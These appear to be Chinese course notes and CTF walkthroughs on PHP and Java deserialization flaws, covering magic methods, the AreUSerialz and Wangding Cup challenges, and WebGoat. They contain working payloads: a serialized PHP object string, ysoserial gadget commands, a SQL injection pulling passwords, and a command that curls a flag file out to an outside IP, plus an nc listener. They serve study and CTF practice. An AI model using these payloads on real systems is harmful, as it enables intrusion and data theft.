目录
37、WEB漏洞-反序列化之PHP(上)
原理
一、先搞一把PHP反序列化热身题稳住-无类问题-本地
1.序列化serialize
2.反序列化unserialize
3.本地源码分析
4.key=123
二、在撸一把 CTF 反序列化小真题压压惊-无类执行-实例
1.实例操作
2. 源代码分析
3. 解题分析(重点)
三、然后抗一把 CTF 反序列化练习题围观下-有类魔术方法触发-本地
1.执行本地代码
结果
四、最后顶一把网鼎杯 2020 青龙大真题舒服下-有类魔术方法触发-实例
1. 靶场源代码分析
2. 设置含类的反序列化
3. 传递参数
38、WEB漏洞-反序列化之JAVA(下)
原理
一、JAVA反序列化及命令执行代码测试
1.第一个程序
2. 另一个程序:
二、WebGoat_Javaweb靶场反序列化测试
三、2020-网鼎杯-朱雀组-Web-think_java真题复现
PHP 反序列化原理:
1.未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。
2.其实跟文件解析差不多,都是由于传递的恶意参数被执行(序列化和反序列化相当于加解密过程)
3.在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。
---序列化函数:serialize() //将一个对象转换成一个字符串
---反序列化函数:unserialize() //将字符串还原成一个对象
魔术方法
在特定情况下会自动触发的方法
#触发:unserialize 函数的变量可控,文件中存在可利用的类,类中有魔术方法
(魔术方法触发条件:1.反序列化2.存在类2.类中存在魔术方法):
参考:CTF PHP反序列化 - MustaphaMond - 博客园
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用 isset()或 empty()触发
__unset() //在不可访问的属性上使用 unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
序列化一般格式
s:4:"name"
数据类型:数据长度:数据名
i:17
数据类型:数据名
不同语言的序列化格式不尽相同,也可以使用如XML、Json等标准格式
php代码在线测试,php在线执行http://www.dooccn.com/php/
php代码
序列化后的格式
结果: s:5:"xiaoD";(string字符串;变量长度为5,变量名为"xiaoD")
#代码=》结果(注意里面有" ",外面只能为单引号' '
结果:xiaoD
类之前
flag文件
类的内容
类之后(主函数)
访问脚本
参数不等,显示源代码
输入参数?str=s:6;"xiaodi";(执行了包含文件)
str=i(数字型没有长度)
i:123;
key="123"(变成字符串)
s:3:"123";
这里仅作案例分享,资源找不到了
但是flag没有显示,原因是上面的请求了Hint。看源代码中的if和else if,是这里的原因。
但是删除了?hint=1111之后,再请求,发现还是不对。原因是代码执行顺序的问题。这又是一个坑。
所以我们传入Cookie的值应该为:
修改cookie
得到flag
包含flag.php文件
如果get传参不为空,就显示源码
如果get没传数据,cookie传参反序列化和包含文件的key相等(注意是===,即要求数值型也要相等),就输出flag变量
$key赋值在下方,所以前面判断的时候key为空(代码执行的先后顺序问题)
要执行cookie,get传递的参数应该为空
应该将空序列化(注意空不是空格)
---创建对象触发construct方法,输出构造函数
---反序列化触发wakeup方法,输出苏醒函数(序列化会检查方法内是否存在sleep函数,如果存在就优先调用;反序列化就调用wakeup函数)
---最后一个程序结束后触发destruct函数,输出析构函数
---如果有tostring函数,存在echo时或者拼接字符串时都会被调用
';
}
function __destruct(){
echo '调用了析构函数
';
}
function __wakeup(){
echo '调用了苏醒函数
';
}
}
echo '创建对象a
';
$a = new ABC;
echo '序列化
';
$a_ser=serialize($a);
echo '反序列化
';
$a_unser=unserialize($a_ser);
echo '对象快要死了!';
?>
CTFHubCTFHub(www.ctfhub.com)专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套writeup,降低CTF学习入门门槛,快速帮助选手成长,跟随主流比赛潮流https://www.ctfhub.com/#/challenge
AreUSerialz这一关
题目思路
第零:根据题目名称及代码中的unserialize函数判断考点是反序列化知识点
第一:程序包含了一个flag.php,显然flag在其中
第二:程序包含两个魔术方法__destruct、__construct
第三:传输str参数数据会触发__destruct,存在is_valid过滤
第四:__destruct会调用process函数,在process函数中,当op=1执行写入函数,当op=2执行读取函数
第五:代码中有类FileHandler,其中3个变量op、filename、content。根据题目要求构造需要的序列化字符串
构造序列化字符串的函数
class FileHandler{
public $op=' 2';//op为1时候是执行写入为2时执行读取,这里需要读取
public $filename="flag.php";//调用flag.php
public $content="xd";//这个随便,题目中没用的
}
$flag = new FileHandler();
$flag_1 = serialize($flag);
echo $flag_1;
?>
涉及知识点
反序列化魔术方法调用、弱类型绕过、ascii 绕过
__destruct函数对$this->op进行了===判断并在内容是为“2”的字符串时会重新赋值op为1,
借助“==”验证数值,“===”验证数值和类型的知识点,这里可以使用数字2或字符串' 2'绕过判断。
is_valid函数还对序列化字符串进行了校验,因为成员被protected修饰,因此序列化字符串中会出现ascii为0的字符。经过测试,在PHP7.2+的环境中,使用public修饰成员并序列化,反序列化后成员也会被public覆盖修饰。
#主函数(传递参数有效就将参数反序列化)
#类之前(包含文件,高亮源代码)
#类的源代码
第一:获取 flag 存储 flag.php
第二:两个魔术方法__destruct __construct
第三:传输 str 参数数据后触发 destruct(反序列化之后,相当于添加了一个对象(但是不会触发construct方法,因为是反序列化得来的)。但是会在最后触发destruct方法),存在 is_valid 过滤(如果OP===2,赋值为1;否则就将content赋值为空,调用process方法)
第四:__destruct 中会调用 process,其中 op=1 就写入, op=2 就调用读取方法并且赋值给res,再打印res(output()为打印),否则就输出坏黑客。
#写入(OP=1写入)
---如果filename和content都存在,并且content的长度小于100,就将content写入filename,并且输出成功。否则输出失败。
#读取(OP=2读取)
---如果filename存在,就读取文件。并且打印读取的内容
第五:涉及对象 FileHandler,变量 op 及 filename,content,进行构造输出
总结:
---传参Str=》destruct方法(强类型对比)
---OP值对比===类型 值
---OP=‘ 2’字符串;OP=‘2’不成立
---成立,强制op=1,反之OP=你设置的值
---process()弱类型对比,将’ 2’和‘2’对比是一致的
要修改原来代码的protect的三个变量(因为原类没有值),只能重新构造filehandler类
重新构造类之后,序列化类传参
#序列化结果
---o表示object对象
---11是对象名的长度
---“FileHandler”为对象名称
---对象中有3个变量
---3个变量的变量类型都是string
#将反序列化的语句序列化验证
payload:
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"2";}
4. 查看源代码
Java中的序列化原理
1. 序列化
将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
2. 反序列化
从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。
3. Java中的api实现
位置1:java.io.ObjectOutputStream
位置2:java.io.ObjectIutputStream
#序列化
java.io.ObjectOutputStream类—》writeObject()
该方法对参数指定的obj对象进行序列化,把字节序列写到一个目标输出流中,按照Java的标准约定是给文件一个.ser扩展名
#反序列化
java.io.ObjectIutputStream类—》readObject()
该方法从一个源输入流中读取字节序列,再把他们反序列化成一个对象,并将其返回
4.Java序列化标志参考
一段数据以“rO0AB”开头,那么它很可能是Java序列化base64加密的数据
一段数据以“aced”开头,那么它很可能是Java序列化的16进制
#主函数
调用序列化方法
将反序列化的的结果返回给person变量
输出person变量
#序列化方法
---创建一个person的对象
---创建一个文件输出流(指向person.txt的文件),命名为oos
#反序列化方法
---创建一个文件输入流(指向person.txt的文件),命名为ois
---从到文件输入流中读取person对象的信息
---返回person对象(直接显示会乱码,一般用base64加密输出)
--使用exec方法执行字符串命令并返回一个process对象
---获取命令(process)的输入流给reader对象
---读取输入流的内容,打印输出(反序列化)
运行结果(这里相当于把ipconfig命令的执行结果给对象化了,然后又在输入流里面读取出来,打印输出)
GitHub - WebGoat/WebGoat: WebGoat is a deliberately insecure application
这里java环境没配置好,直接上截图
1.启动靶场,进入靶场
2.理论分析#进入靶场
---输入框内接受序列化的对象,并且将它反序列化(更改序列化的对象,将页面延迟5秒)
#源代码分析
---接受参数,base64解密,反序列化读取,返回读取的对象
---获取输出流,赋值给一个对象,然后写入输出流(序列化),返回base64编码
---这里存在命令执行(在调用读取输入流的时候,也就是读取反序列化的数据,并且把它当做命令执行)
---漏洞分析:这里会将反序列化的数据进行读取,再进行命令执行。
rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l是序列化后加密形成
---序列化标志参考(可以确定是base64加密),因此要攻击,要如何构造payload?考虑对方的回显?==》反弹shell(解决回显)
---思路:要执行ipconfig=》序列化=》base64加密=》rO0AB格式字符串=》payload
2. 使用工具将命令构造成序列化语句
#命令分析
---生成组件,打开本地的计算器,保存到payload.bin文件中
---为什么要保存?还要进行base64加密
java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;
ysoserial-master-30099844c6-1.jar
ysoserial.GeneratePayload Hibernate1 calc.exe > payload.bin
#如何判断组件
---看工具的组建在源代码内是否出现过
---这里源代码出现了组件
#生成payload
java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;ysoserial-master-8eb5cbfbf6-1.jar ysoserial.GeneratePayload Hibernate1 calc.exe > payload.bin
---如果生成了payload
利用Python程序base54加密
思路
为了确保执行的命令可以回显,使用反弹shell
命令,如ipconfig->序列化->(base64)->最终payload
如果服务器上有应用程序框架,可以利用应用程序框架上存在的反序列化漏洞
0x01 注入判断,获取管理员帐号密码
题目附件中存在“SqlDict”的字样,“SqlDict.class”中有SQL语句,判断题目与SQL注入有关
使用burpsuite抓包,把“Test.class”中的地址作为数据包POST的数据;根据附件中的数据库信息构建SQL语句
POST /common/test/sqlDict
dbName=myapp?a=' union select (select pwd from user)#
获得账号密码
0x02 接口测试
从附件代码“import io.swagger.annotations.ApiOperation;”中得知程序使用了swagger开发接口,通过该接口实现账号密码的登录测试
默认登录地址“/swagger-ui.html”,将该地址加到网址后
查看该接口的登录功能,把之前获得的账号密码带入到测试功能中,在返回体中找到一段“rO0AB”开头的数据
"password":"ctfhub_29588_13038",
"username": "ctfhub"
返回体:
{
"data": "Bearer rO0ABXNyABhjbi5hYm……(省略部分内容),
"msg": "登录成功",
"status": 2,
"timestamps": 1594549037415
}
查看该接口的获取当前用户信息功能,把之前获得的反序列化的“data”值作为身份验证Token的值带入,显示的内容包含用户名等信息
0x03 回显数据分析攻击思路
将之前得到的反序列化数据解密
先利用py2脚本进行base64解密数据
import base64
a = "rO0ABXNyABhjbi5hYm……(省略部分内容)"
b = base64.b64decode(a).encode('hex')
print(b)
再利用SerializationDumper解析数据
java -jar SerializationDumper.jar (base64后的数据)
解密后的原始数据包含用户名等信息
0x04 生成反序列化payload
将恶意代码进行序列化后进行后续操作
利用ysoserial进行序列化生成
java -jar ysoserial-master-30099844c6-1.jar ROME "curl http://47.75.212.155:4444 -d @/flag" > xiaodi.bin
利用py2脚本进行反序列化数据的提取
import base64
file = open("xiaodi.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()
0x05 触发反序列化,获取flag
服务器监听,接收反弹shell的数据:
nc -lvvp 4444
将带有恶意代码的payload发送给网站,触发反序列数据加载操作